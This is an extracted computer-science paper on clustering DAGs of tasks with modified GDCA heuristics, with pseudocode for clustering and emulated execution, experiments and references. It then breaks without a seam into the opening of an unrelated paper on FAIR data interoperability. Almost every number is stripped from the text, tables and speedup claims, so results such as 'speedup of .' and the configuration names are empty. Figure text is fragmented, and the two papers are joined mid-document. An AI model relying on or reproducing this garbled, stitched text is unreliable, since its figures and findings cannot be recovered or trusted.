by the complete duration of the macro-task compared to execution without clustering and this delay also implies a reduction of the degree of parallelism. however, if the degree of parallelism at a global level remains high, the execution could still be faster because it is expected that the clustering will reduce the overhead. dag of tasks clustering modification of the gdca before entering into the details of our approach, we first give a general description of the original algorithm. the algorithm continuously maintains a list of ready tasks by processing the graph while respecting the dependencies. it works on the ready tasks only to build a cluster. by doing so, all the predecessors of the ready tasks are already assigned to a cluster, and all the ready tasks and their successors are not assigned to any cluster. this strategy ensures that no cycle will be created while building the clusters. to create a cluster, the algorithm first picks one of the ready tasks, based on a heuristic that we call the initial-selection. then it iteratively aggregates some ready nodes to it until the cluster reaches m nodes, using what we call aggregate-selection. every time a node is put in a cluster, the algorithm releases its dependencies and potentially adds new ready tasks to the list. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. x (a) (b) (d)(c) y z vu x y z vu x y z vu x y z vu figure illustration of the gdca. ready tasks are in blue, tasks assigned to the new cluster are in red. 
(a) nodes x, y and z are ready, and here y is selected as first node for the current cluster p to create (initial-selection). (b) nodes x, v and z are ready, and we have to select the next nodes to put in p (agregate-selection). if the criteria to decide is the number of predecessors in the cluster, then v is selected. (c) nodes x and z are ready, and both nodes have zero predecessors in p. if we look at the successors they have in common with p, then u is selected. (d) node z is ready, and it might have no predecessors or successors in common with nodes in p. if we use a strict cluster size, then z should be added to p, otherwise, the cluster p is done. full-size doi: . /peerjcs. /fig- the initial-selection and the aggregate-selection are the two heuristics that decide which node to select to start a cluster, and which nodes to add to the ongoing cluster. the initial-selection picks the node with the lowest depth, where the depth of a node is the longest distance to the roots. the aggregate-selection picks the tasks that has the largest number of predecessors in the new cluster. for both selections, the lowest ids is selected in case of equality to enforce a strict order of the nodes. in figure , we provide an example of clustering that illustrates why we potentially need additional heuristics for the aggregate-selections. in fig. b both nodes x and z are ready and could be selected, but node z has no connections with the new cluster. the original algorithm does not have a mechanism to detect this situation. second, in fig. d since z has no connections with the new cluster, it could be disadvantageous to add it. if we imagine the case where a graph is composed of two independent parts, connecting them is like putting a synchronization on their progress. on the other hand, if we need clusters of a fixed size, as it is the case in the original algorithm, there is no choice and z must be put in the cluster. in appendix, we provide two graphs that were clustered using gdca, see figs. a and a . change in the initial-selection. we propose to select the node using the depth (like in the original algorithm), but also to use the number of predecessors. our objective is to privilege the nodes with the highest number of predecessors that we consider more critic. change in the aggregate-selection. to select the next node to add to a cluster, we choose the node with the highest number of predecessors in the cluster, but in case of equality, we compare the number of nodes in common between the successors of the cluster and the successors of the candidates. for instance, in fig. a, the node x has one common successor with the new cluster (node u), but as the number of predecessors in the cluster is more significant v is selected. then, in fig. b, x has one common successor, and z none, therefore, with this heuristic x is selected. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. flexible cluster size. if no nodes in the ready list have a predecessor in the cluster or a common successor, then we can decide to stop the construction of the current cluster and start a new one, which means that some clusters will have less than m nodes. this heuristic would stop the construction of the new cluster in fig. d. full algorithm. the complete solution is provided in algorithm . 
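the two orderings described above can be written as plain comparators. the structure and field names below are ours; the fields simply mirror the quantities used by the heuristics (depth, number of predecessors, predecessors already placed in the new cluster, successors in common with the cluster, and the id used as a strict tie-breaker), and the initial-selection shown is the modified one that also considers the number of predecessors.

```cpp
#include <tuple>

// candidate node as seen by the two selection heuristics; field names are ours
struct Candidate {
    int id = 0;               // strict tie-breaker, as in the text
    int depth = 0;            // longest distance to the roots
    int numPredecessors = 0;  // total predecessors in the dag
    int predsInCluster = 0;   // predecessors already placed in the new cluster
    int commonSuccessors = 0; // successors shared with the cluster being built
};

// modified initial-selection: lowest depth first, then the node with the most
// predecessors, then the lowest id to enforce a strict order
bool initialSelectionBefore(const Candidate& a, const Candidate& b) {
    return std::make_tuple(a.depth, -a.numPredecessors, a.id)
         < std::make_tuple(b.depth, -b.numPredecessors, b.id);
}

// aggregate-selection: most predecessors inside the new cluster first, then the most
// successors in common with the cluster, then the lowest id
bool aggregateSelectionBefore(const Candidate& a, const Candidate& b) {
    return std::make_tuple(-a.predsInCluster, -a.commonSuccessors, a.id)
         < std::make_tuple(-b.predsInCluster, -b.commonSuccessors, b.id);
}
```

sorting the ready list with the first comparator picks the node that starts a cluster, and re-sorting with the second picks the next node to aggregate, matching the tie-breaking cases discussed for the figure above.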
the gdca algorithm is annotated with our modifications and we dissociate gdcav that includes the change in the nodes selections, and gdcaws that includes the stop when no ready node has a connection with the new cluster. the main loop, line , ensures that the algorithm continues until there are no more ready nodes in the list. the initial-selection is done at line , where the algorithm compares the depth, the number of predecessors and the ids of each node. this can be implemented using a sort or simply by selecting the best candidate as the list will be rearranged and updated later in the algorithm. at line , the dependencies of the master node are released. if some of its predecessors become ready (line ), they are put in the list and their counters of predecessors in the new cluster are incremented. otherwise (line ), they are put in a set that includes all the successors of the new cluster. this set is used line , to count the common successors between the cluster and each ready node. in an optimized implementation, this could be done only if needed, i.e. if the best nodes have equal number of predecessors in the cluster during the aggregate-selection. at line , the ready nodes are sorted using their number of predecessors in the cluster, their number of common successors with the cluster and their ids. if we have flexible cluster size, we can stop the construction of the new cluster (line ) if we consider that no nodes are appropriate. otherwise, the next node is added to the cluster, its dependencies are released and the counter updated (from line to line ). in appendix, we provide an example of emulated execution of a dag using this method, see fig. a . emulating the execution of dag of tasks iterating on a dag to emulate an execution with a limited number of processing units is a classical algorithm. however, how the overhead should be defined and included in the model is still evolving (kestor, gioiosa & chavarra-miranda, ). we propose to take into account three different overheads: one overhead per task execution, and two overheads for the release and the selection of a ready task. using an overhead per task is classically admitted in the majority of models. in our case, this overhead is a constant per task - no matter the task’s size - and only impacts the worker that will execute the task. for example, if the overhead per task is ot and a worker starts the execution of a task of duration d at time t, the worker will become available at t+d+ot . the accumulated cost duration implied by this overhead decreases proportionally with the number of tasks (i.e., the more tasks per cluster the less total overhead). second, our model includes an overhead every time a task is released or assigned to a worker. when a task is released, it has to be pushed in the ready task list, and this implies either some synchronization or lock-free mechanisms with a non-negligible cost. the same happens when a task is popped from the list and assigned to a worker. moreover, the bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pushes and pops compete to modify the ready list, and in both cases, this can be seen as a lock with only one worker at a time that accesses it. as a result, in our model, we increment the global timestamp variable every time the list is modified. we provide our solution in algorithm , which is an extension of the dag execution algorithm with a priority queue of workers. 
the workers are stored in the queue based on their next availability and we traverse the graph while maintaining the dependencies and a list of ready tasks. at line , we initialize the current time variable using the number of ready tasks and the push overhead, considering that all these tasks are pushed in the list and this makes it impossible to access it. then, at line , we assign tasks to the available workers and store them in the priority queues using the cost of each task and the overhead per task, see line . then, in the core loop, line , we pick the next available worker, release the dependencies for the task it was computed, and assign tasks to idle workers (until there are no more tasks or idle workers). finally, we wait for the last workers to finish at line . our execution model is used to emulate the execution of a dag on a given architecture, but we also use it to found the best cluster granularity. to do so, we emulate executions starting with a size m = and we increase m and keep track of the best granularity found so far b. we stop after granularity ×b. the idea is that we will have a speedup as we increase the granularity until we constraint too much the degree of parallelism. but in order not to stop at the first local minima (the first time an increase of the granularity results in an increase of the execution time), we continue to test until the granularity equals two times the best granularity we have found. experimental study we evaluate our approach on emulated executions and on a real numerical application. emulated executions graph data-set. we use graphs of different properties that we summarize in table . they were generated from the polybench collection (grauer-gray et al., ), the daggen tool (suter, ) or by ourselves. the graphs from daggen are complex in the sense that their nodes have important number of predecessors/successors and that the cost of the tasks are significant and of large intervals. the graphs with names starting by chukrut are the test cases for the real application. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : gdca algorithm, where m is the desired cluster size. gdcav includes the lines in black underlined-bold. gdca-ws includes the lines in gray. 
function cluster(g=(v ,e), m) ready←get_roots(g) // gets the roots depths←distance_from_roots(g, ready) // gets the distance from roots count_deps_release = ∅ // # of released dependencies cpt_cluster = while ready is not empty do count_pred_master = ∅ // # predecessors in the new cluster count_next_common = ∅ // # common successors // sort by, first increasing depths, second decreasing number // of predecessors, third increasing ids (to ensure a strict // order) ready.sort() master = ready.pop_front() clusters[master] = cpt_cluster master_boundary = ∅ for u∈ successors[master] do count_deps_release[u] += if count_deps_release[u] equal |predecessors[u]| then ready.insert(u) count_pred_master[u] = else master_boundary.insert(u) end end cluster_size = while cluster_size < m do for u∈ ready do count_next_common[u] = | successors[u]∩master_boundary | end // sort by, first decreasing count_pred_master, second // increasing depths, third decreasing count_next_common, // fourth increasing ids (to ensure a strict order) ready.sort() next = ready.front(); if count_pred_master[next] is and count_next_common[next] is then break; end ready.pop_front() cluster_size += clusters[next] = cpt_cluster for u∈ successors[next] do count_deps_release[u] += if count_deps_release[u] equal |predecessors[u]| then ready.insert(u) count_pred_master[u] = for v∈predecessors[u] do if clusters[v] == clusters[master] then count_pred_master[u] += end end master_boundary.erase(u) else master_boundary.insert(u) end end end cpt_cluster += end hardware. we consider four systems in total, two imaginary hardware with two type of overhead low (l) and high (h), with the following properties: bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : emulate an execution of g using w workers. the overheads are push_overhead, pop_overhead and task_overhead. function emulate_execution(g=(v ,e), w , push_overhead, pop_overhead, task_overhead) idle_worker← list( , w- ) current_time← ready←get_roots(g) current_time←push_overhead× ready.size() nb_computed_task← workers← empty_priority_queue() while ready is not empty and idle_worker is not empty do task← ready.pop() worker← idle_worker.pop() current_time← current_time + pop_overhead workers.enqueue(worker, task, current_time, costs[u] + task_overhead) nb_computed_task←nb_computed_task + end deps← while nb_computed_task = |tasks|do [task, worker, end]←workers.dequeue() current_time←max(current_time, end) idle_worker.push(worker) for v∈ successors[u] do deps[v]←deps[v] + if |deps[v]|= |predecessors[v]| then ready.push(v) end end while ready is not empty and idle_worker is not empty do task← ready.pop() worker← idle_worker.pop() current_time← current_time + pop_overhead workers.enqueue(worker, task, current_time, costs[u] + task_overhead) nb_computed_task←nb_computed_task + end end while nb_computed_task = |tasks|do [task, worker, end]←workers.dequeue() current_time←max(current_time, end) end return current_time • config- -l: system with threads and overhead per task . , per push . and per pop . . • config- -h: system with threads and overhead per task , per push and per pop . • config- -l: system with threads and overhead per task . , per push . and per pop . . • config- -h: system with threads and overhead per task , per push and per pop . the given overheads are expressed in terms of proportion of the total execution time of a graph. 
consequently, if d is the total duration of a graph (the sum of the duration of the n tasks), and if the overhead is ot , then the overhead per task is given by d×ot /n . increasing granularity. in figure , we show the duration of the emulated executions as the granularity increases for twelve of the graphs. as expected the execution time decreases as the granularity increases in most cases since the impact of the overhead is mitigated. using threads (config- -l/red line) instead of (config- -l/green line) does not speed up the execution when the overhead is low, and this is explained by the fact that the average degree of parallelism is lower than for most graphs. in figs. h and k, the bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. execution time shows a significant variation depending on the clustering size. this means that for some cluster sizes several workers are not efficiently used by being idle (waiting for another a worker to finish its task and release the dependencies), while for some other sizes the workload per worker is well balanced and the execution more efficient. note that we increase the granularity up to two times the best granularity we have found, and this appears to be a good heuristic to catch the best cluster size without stopping at the first local minima. details. in table , we provide the best speedup we have obtained by taking execution times without clustering as reference. we provide the results for the gdca and the updated method (gdcav ), and also show the best granularity for each case. the gdcav provides a speedup over gdca in many cases. for instance, for the daggen’s graphs the gdcav method is faster in most cases. in addition, there are cases where the gdcav provide a significant speedup, such as the graphs polybench - kernel trmm, polybench - kernel jacobi d imper and polybench - kernel gemvr. for the config- -h configuration and the polybench - kernel gemvr graph, the gdca has a speedup of . , and gdcav . . however, there are still many cases where gdca is faster, which means that to cluster a graph from a specific application it is required to try and compare both methods. in addition, this demonstrates that while our modifications of gdca seem natural when we look at the graph at a low level, they do not necessarily provide an improvement at a global level due to corner cases. moreover, the ids of the nodes are more important in gdca than in gdcav , and this information is usually not random and includes the order of construction of the tasks. concerning gdcaws, the method is not competitive for most of the graphs. however, it provides a significant speedup for the chukrut graphs, which are the ones use in our real application. real application hardware configuration we use the following computing nodes: • intel- t : × intel(r) xeon(r) cpu e - v @ . ghz, with caches l k, l k and l k ( threads in total). • intel- t : × intel(r) xeon(r) gold cpu @ . ghz v , with caches l k, l k and l k ( threads in total). software configuration. we use the gnu c compiler . . . we parallelize using openmp threads and we do not use any mutex during the execution. we only use lock-free mechanisms implemented with c atomic variables to manage the dependencies and the list of ready tasks, which is actually an array updated using atomics. test cases. the two test cases represent a d mesh that has the shape of a disk with sizes and . 
the details of the two corresponding graphs are provided in table under the names chukrut - disque and chukrut - disque . the execution of a single task takes around . · − s. to estimate the overhead, we take the execution time in sequential t and the execution time using a third of the available threads tx and do bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table details of the studied graphs. the degree of parallelism is obtained by iterating on the graph, while respecting the dependencies, and measure the size of the ready task list (the average size or the largest size found during the execution). name #vertices #edges #predecessors total cost cost degree of parallelism avg max min avg max avg max createdag - agraph- dgrid- . . createdag - agraph-deptree- . . createdag - agraph-doubletree- . . createdag - agraph-tree- . . chukrut - disque . . chukrut - disque . . daggen - - - - - . . e+ . e+ . e+ . e+ . daggen - - - - - . . e+ . e+ . e+ . e+ . daggen - - - - - . . e+ . e+ . e+ . e+ . daggen - - - - - . . e+ . e+ . e+ . e+ . daggen - - - - - . . e+ . e+ . e+ . e+ . polybench - kernel mm . . polybench - kernel mm . . polybench - kernel adi . . polybench - kernel atax . . polybench - kernel covariance . . polybench - kernel doitgen . polybench - kernel durbin . . polybench - kernel fdtd d . polybench - kernel gemm . polybench - kernel gemver . . polybench - kernel gesummv . . polybench - kernel jacobi d imper . polybench - kernel jacobi d imper . polybench - kernel lu . polybench - kernel ludcmp . . polybench - kernel mvt . polybench - kernel seidel d . . polybench - kernel symm . polybench - kernel syr k . polybench - kernel syrk . polybench - kernel trisolv . . polybench - kernel trmm . . b ram as and k etterlin ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. granularity te m ps (s ) disque .dot (a) granularity × × × te m ps (s ) generated-dag- - _ - _ - - _ .dot (b) granularity te m ps (s ) kernel_atax.dot (c) granularity × × × × te m ps (s ) kernel_durbin.dot (d) granularity te m ps (s ) kernel_trmm.dot (e) granularity te m ps (s ) kernel_seidel_ d.dot (f) granularity te m ps (s ) kernel_jacobi_ d_imper.dot (g) granularity te m ps (s ) kernel_gemver.dot (h) granularity t em ps (s ) agraph- dgrid- .dot (i) granularity te m ps (s ) kernel_covariance.dot (j) granularity te m ps (s ) kernel_fdtd_ d.dot (k) config / . / . / . config / . / . / . config / . / . / . config / . / . / . gdca gdcav (l) legend figure emulated execution times against cluster granularity g for different test cases, different ma- chine configurations (colors ----) and different strategies (nodes•n). (a) disque . (b) generated-dag- - . - . - - . . (c) kernel atax. (d) kernel durbin. (e) kernel trmm. (f) kernel seidel. (g) kernel ja- cobi d imper. (h) kernel gemver. (i) agraph dgrid- . (j) kernel covariance. (k) kernel fdtf d. full-size doi: . /peerjcs. /fig- o=(tx×x−t )/t . we obtained an overhead of on intel- t and of . on intel- t. we dispatch this overhead one half for the overhead per task, and one quarter for the push/pop overheads. the execution times are obtained from the average of executions. we increase the granularity up to m = in order to show if our best granularity selection heuristic would miss the best size. results. in fig. , we provide the results for the two test cases on the two computing nodes. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table speedup obtained by clustering the graphs on emulated executions for gdca and gdcav . the best granularity for the different graphs is provided, and the speedup is in bold when one of the two clustering strategies appears more efficient than the other for a given hardware. gdcaws is slower in most cases, except for the graphs from createdag and chukrut. for the configuration config- -h, gdcaws get a speedup of for chukrut - disque and of for chukrut - disque . name config- -l config- -h config- -l config- -h gdca gdcav gdca gdcav gdca gdcav gdca gdcav g sp. g sp. g sp. g sp. g sp. g sp. g sp. g sp. createdag - agraph- dgrid- . . . . . . . . createdag - agraph-deptree- . . . . . . . . createdag - agraph-doubletree- . . . . . . . . createdag - agraph-tree- . . . . . . . . chukrut - disque . . . . . . . . chukrut - disque . . . . . . . . daggen - - - - - . . . . . . . . daggen - - - - - . . . . . . . . daggen - - - - - . . . . . . . . daggen - - - - - . . . . . . . . daggen - - - - - . . . . . . . . polybench - kernel mm . . . . . . . . polybench - kernel mm . . . . . . . . (continued on next page) b ram as and k etterlin ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) name config- -l config- -h config- -l config- -h gdca gdcav gdca gdcav gdca gdcav gdca gdcav g sp. g sp. g sp. g sp. g sp. g sp. g sp. g sp. polybench - kernel adi . . . . . . . . polybench - kernel atax . . . . . . . . polybench - kernel covariance . . . . . . . . polybench - kernel doitgen . . . . . . . . polybench - kernel durbin . . . . . . . . polybench - kernel fdtd d . . . . . . . . polybench - kernel gemver . . . . . . . . polybench - kernel gesummv . . . . . . . . polybench - kernel jacobi d imper . . . . . . . . polybench - kernel jacobi d imper . . . . . . . . polybench - kernel lu . . . . . . . . polybench - kernel ludcmp . . . . . . . . polybench - kernel mvt . . . . . . . . polybench - kernel seidel d . . . . . . . . polybench - kernel symm . . . . . . . . polybench - kernel syr k . . . . . . . . polybench - kernel syrk . . . . . . . . polybench - kernel trisolv . . . . . . . . polybench - kernel trmm . . . . . . . b ram as and k etterlin ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. gdca gdcaws gdcav emulation with overhead real execution (a) legend granularity (m) sp ee du p intel- t- s - size (b) granularity (m) sp ee du p intel- t- s - size (c) granularity (m) sp ee du p intel- t- s - size (d) granularity (m) sp ee du p intel- t- s - size (e) figure speedup obtained for the two test cases with different clustering strategies. we show the speedup obtained from emulated executions (dashed lines) and from the real executions (plain lines). (a) inter- t- s size . (b) inter- t- s size . (c) inter- t- s size . (d) inter- t- s size . full-size doi: . /peerjcs. /fig- in the four configurations, the emulation of gdcaws (blue dashed line) is too optimistic compared to the real execution (blue line): on intel- t, figs. b and c, gdcaws performed poorly (blue line), but on intel- t, figs. d and e, gdcaws is efficient for large granularities. however, even if it is efficient on average on intel- t, it never provides the best execution. 
this means that having a flexible cluster size is not the best approach for these graphs and that having fewer clusters but of a fixed size (even if it adds more dependencies) seems more appropriate. concerning the emulation, our model does not catch the impact of having clusters of different sizes. the emulation of gdca is more accurate (dashed green line) when we compare it with the real execution (green line), even if the real execution is always underperforming. however, the global shape is correct and, importantly, the performance peaks that happen bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. in the emulation also happen in the real execution. this means that we can use emulated executions to find the best clustering size for the gdca. in terms of performance, gdca provides the best execution on the intel- t for m between and . the emulation of gdcav is accurate for the intel- t (figs. b and c) with a superimposition of the plots (dashed/plain purple lines). however, it is less accurate for the intel- t (figs. d and e) where the real execution is underperforming compared to the emulation. as for the gdca, the peaks of the emulation of the gdcav concord with the peaks of the real executions. gdcav provides the best performance on the intel- t, for m between and . gdca and gdcav have the same peaks; therefore, for some cluster sizes the degree of parallelism is much better and the filling of the workers more efficient. but gdcav is always better on the intel- t, while on the intel- t both are very similar except that gdca is faster at the peaks. while the difference is not necessarily significant this means that the choice between gdca and gdcav is machine-dependent. conclusion the management of the granularity is one of the main challenges to achieve high- performance using the tasks and dependencies paradigm. gdca allows controlling the granularity of the tasks by grouping them to obtain a macro-dag. in this paper, we have presented gdcav and gdcaws two modified version of gdca. we evaluated the benefit of gdca and gdcav on emulated executions. we have demonstrated that our modifications allow obtaining significant speedup in several cases but that it remains unknown which of the two methods will give the best results. we evaluated the three algorithms on a real application and we have demonstrated that clustering the dag allowed to get a speedup of compared to executions without clustering. we were able to find the best granularity using emulated execution based on a model that incorporates different overheads. as a perspective, we would like to plug our algorithm directly inside an existing task-based runtime system to cluster the dag on the fly during the execution. this would require a significant programming effort but will open the study of more applications and certainly lead to improving not only the selection of the parameters but also the estimation of the costs and the overheads. in addition, we would like to adapt the aggregate-selection during the clustering process in order to always use the best of gdca and gdcav . acknowledgements the experiments presented in this paper were carried out using the plafrim experimental testbed, supported by inria, cnrs (labri and imb), université de bordeaux, bordeaux inp and conseil régional d’aquitaine (see https://www.plafrim.fr/). appendix figures a and a are examples of graph clustering with our method. 
figure a shows an example of a graph clustering and an emulated execution.
figure a: clustering of a graph of nodes generated by propagation of the dependencies on a d grid from one corner to the opposite one. the cluster size is m = ; there are clusters. [per-node cluster labels omitted.]
figure a: clustering of a graph of nodes generated by the transport equation on a disk. the cluster size is m = ; there are clusters. [per-node cluster labels omitted.]
figure a: example of the polybench jacobi d clustering and execution. the graph was generated with parameters iter = and n = . the execution time obtained with granularity, (c), is slower than without granularity, (b), because the overhead is limited and the dependencies make it difficult to find a meta-graph where the parallelism is not constrained. (a) clustered graph with m = ; the original graph has nodes and an estimated degree of parallelism of , while the clustered one has nodes and an estimated degree of parallelism of . (b) emulation of the execution of the original graph with threads in units of time; each original task has a cost of , and the overheads are per task, per push and per pop. (c) emulation of the execution of the clustered graph with threads in units of time; each original task has a cost of , and the overheads are per task, per push and per pop. [worker timelines omitted.]
additional information and declarations
funding
the authors received no funding for this work.
agullo e, bramas b, coulaud o, darve e, messner m, takahashi t. . task-based fmm for heterogeneous architectures. concurrency and computation: practice and experience ( ): – doi . /cpe. . agullo e, buttari a, guermouche a, lopez f. . task-based multifrontal qr solver for gpu-accelerated multicore architectures. in: ieee nd international conference on high performance computing (hipc). piscataway: ieee, – doi . /hipc. . . augonnet c, thibault s, namyst r, wacrenier p-a. . starpu: a unified platform for task scheduling on heterogeneous multicore architectures. concurrency and computation: practice and experience ( ): – doi . /cpe. . bauer m, treichler s, slaughter e, aiken a. . legion: expressing locality and independence with logical regions. in: international conference on high performance computing, networking, storage and analysis. piscataway: ieee, . bramas b. . optimization and parallelization of the boundary element method for the wave equation in time domain. phd thesis, bordeaux university. bramas b. a. impact study of data locality on task-based applications through the heteroprio scheduler. peerj computer science :e doi . /peerj-cs. . bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://gitlab.inria.fr/bramas/dagpar https://gitlab.inria.fr/bramas/dagpar https://figshare.com/projects/dagpar/ https://figshare.com/projects/dagpar/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /hipc. . http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. bramas b. b. increasing the degree of parallelism using speculative execution in task-based runtime systems. peerj computer science :e doi . /peerj-cs. . carpaye jmc, roman j, brenner p. . design and analysis of a task-based parallelization over a runtime system of an explicit finite-volume cfd code with adaptive time stepping. journal of computational science : – doi . /j.jocs. . . . cong j, li z, bagrodia r. . acyclic multi-way partitioning of boolean networks. in: st design automation conference. – doi . / . . coulette d, franck e, helluy p, mehrenberger m, navoret l. . high-order implicit palindromic discontinuous galerkin method for kinetic-relaxation approximation. comput. & fluids : – doi . /j.compfluid. . . . danalis a, bosilca g, bouteiller a, herault t, dongarra j. . ptg: an abstraction for unhindered parallelism. in: proceedings of the fourth international workshop on domain-specific languages and high-level frameworks for high performance computing, (wolfhpc), ieee. piscataway: ieee, – . fiduccia cm, mattheyses rm. . a linear-time heuristic for improving network par- titions. in: th design automation conference. – doi . /dac. . . gautier t, lima jvf, maillard n, raffin b. . xkaapi: a runtime system for data-flow task programming on heterogeneous architectures. in: ieee th international symposium on parallel & distributed processing (ipdps). ieee, – . grauer-gray s, xu l, searles r, ayalasomayajula s, cavazos j. . auto-tuning a high-level language targeted to gpu codes. in: innovative parallel computing (inpar). – doi . /inpar. . . hendrickson b, kolda tg. . graph partitioning models for parallel computing. parallel computing ( ): – doi . /s - ( ) -x. hendrickson b, leland r. . a multi-level algorithm for partitioning graphs. in: supercomputing ’ :proceedings of the acm/ieee conference on supercomputing. 
submitted october; accepted march; published april
corresponding author: mark d. wilkinson, markw@illuminae.com
academic editor: sebastian ventura
copyright wilkinson et al., distributed under creative commons cc-by. open access.
interoperability and fairness through a novel combination of web technologies
mark d. wilkinson, ruben verborgh, luiz olavo bonino da silva santos, tim clark, morris a. swertz, fleur d.l. kelpin, alasdair j.g. gray, erik a. schultes, erik m. van mulligen, paolo ciccarese, arnold kuzniar, anand gavai, mark thompson, rajaram kaliyaperumal, jerven t.
bolleman and michel dumontier
affiliations: center for plant biotechnology and genomics upm-inia, universidad politécnica de madrid, madrid, spain; imec, ghent university, ghent, belgium; dutch techcentre for life sciences, utrecht, the netherlands; department of neurology, massachusetts general hospital, boston, ma, united states of america; department of neurology, harvard medical school, boston, united states of america; genomics coordination center and department of genetics, university medical center groningen, groningen, the netherlands; department of computer science, school of mathematical and computer sciences, heriot-watt university, edinburgh, united kingdom; fair data, dutch techcenter for life science, utrecht, the netherlands; department of medical informatics, erasmus university medical center, rotterdam, the netherlands; elmer innovation lab, harvard medical school, boston, united states of america; netherlands escience center, amsterdam, the netherlands; department of human genetics, leiden university medical center, leiden, the netherlands; swiss-prot group, sib swiss institute of bioinformatics, centre medical universitaire, geneva, switzerland; stanford center for biomedical informatics research, stanford university school of medicine, stanford, ca, united states of america
abstract
data in the life sciences are extremely diverse and are stored in a broad spectrum of repositories, ranging from those designed for particular data types (such as kegg for pathway data or uniprot for protein data) to those that are general-purpose (such as figshare, zenodo, dataverse or eudat). these data have widely different levels of sensitivity and security considerations. for example, clinical observations about genetic mutations in patients are highly sensitive, while observations of species diversity are generally not. the lack of uniformity in data models from one repository to another, and in the richness and availability of metadata descriptions, makes integration and analysis of these data a manual, time-consuming task with no scalability. here we explore a set of resource-oriented web design patterns for data discovery, accessibility, transformation, and integration that can be implemented by any general- or special-purpose repository as a means to assist users in finding and reusing their data holdings. we show that by using off-the-shelf technologies, interoperability can be achieved at the level of an individual spreadsheet cell. we note that the behaviours of this architecture compare favourably to the desiderata defined by the fair data principles, and can therefore represent an exemplar implementation of those principles. the proposed interoperability design patterns may be used to improve discovery and integration of both new and legacy data, maximizing the utility of all scholarly outputs.
how to cite this article: wilkinson et al., interoperability and fairness through a novel combination of web technologies. peerj comput. sci., doi . /peerj-cs.
subjects: bioinformatics, data science, databases, emerging technologies, world wide web and web science
keywords: fair data, interoperability, data integration, semantic web, linked data, rest
introduction
carefully-generated data are the foundation for scientific conclusions, new hypotheses, discourse, disagreement and resolution of these disagreements, all of which drive scientific discovery. data must therefore be considered, and treated, as first-order scientific output, upon which there may be many downstream derivative works, among them the familiar research article (starr et al., ). but as the volume and complexity of data continue to grow, a data publication and distribution infrastructure is beginning to emerge that is not ad hoc, but rather explicitly designed to support discovery, accessibility, (re)coding to standards, integration, machine-guided interpretation, and re-use. in this text, we use the word "data" to mean all digital research artefacts, whether they be data (in the traditional sense), research-oriented digital objects such as workflows, or combinations/packages of these (i.e., the concept of a "research object"; bechhofer et al., ). effectively, all digital entities in the research data ecosystem will be considered data by this manuscript. further, we intend "data" to include both data and metadata, and recognize that the distinction between the two is often user-dependent.
data of all types are often published online, where the practice of open data publication is encouraged by the scholarly community and increasingly adopted as a requirement of funding agencies (stein et al., ). such publications utilize either a special-purpose repository (e.g., model-organism or molecular data repositories) or, increasingly commonly, a general-purpose repository such as figshare, zenodo, dataverse, eudat, or even an institutional repository. special-purpose repositories generally receive dedicated funding to curate and organize data, and have specific query interfaces and apis to enable exploration of their content. general-purpose repositories, on the other hand, allow publication of data in arbitrary formats, with little or no curation and often very little structured metadata.
both of these scenarios pose a problem with respect to interoperability. while apis allow mechanized access to the data holdings of a special-purpose repository, each repository has its own api, thus requiring specialized software to be created for each cross-repository query. moreover, the ontological basis of the curated annotations is not always transparent (neither to humans nor machines), which hampers automated integration. general-purpose repositories are less likely to have rich apis, thus often requiring manual discovery and download; however, more importantly, the frequent lack of harmonization of the file types/formats and coding systems in the repository, and the lack of curation, results in much of their content being unusable (roche et al., ).
previous projects, specifically in the bio/medical domain, that have attempted to achieve deep interoperability include cabio (covitz et al., ) and tapir (de giovanni et al., ). the former created a rich soap-based api, enforcing a common interface over all repositories. the latter implemented a domain-specific query language that all participating repositories should respond to. these initiatives successfully enabled
powerful cross-resource data exploration and integration; however, this was done at the expense of broad-scale uptake, partly due to the complexity of implementation, and/or required the unavoidable participation of individual data providers, who are generally resource-strained. moreover, in both cases, the interoperability was aimed at a specific field of study (cancer and biodiversity, respectively), rather than a more generalized interoperability goal spanning all domains.
with respect to more general-purpose approaches, and where 'lightweight' interoperability was considered acceptable, mygrid (stevens, robinson & goble, ) facilitated discovery and interoperability between web services through rich ontologically-based annotations of the service interfaces, and biomoby (wilkinson et al., ) built on these mygrid annotations by further defining a novel ontology-based service request/response structure to guarantee data-level compatibility and thereby assist in workflow construction (withers et al., ). sadi (wilkinson, vandervalk & mccarthy, ) and sswap (gessler et al., ) used the emergent semantic web technologies of rdf and owl to enrich the machine-readability of web service interface definitions and the data being passed—sadi through defining service inputs and outputs as instances of owl classes, and sswap through passing data embedded in owl 'graphs' to assist both client and server in interpreting the meaning of the messages. in addition, two web service interoperability initiatives emerged from the world wide web consortium—owl-s (martin et al., ) and sawsdl (martin, paolucci & wagner, )—both of which used semantic annotations to enhance the ability of machines to understand web service interface definitions and operations.
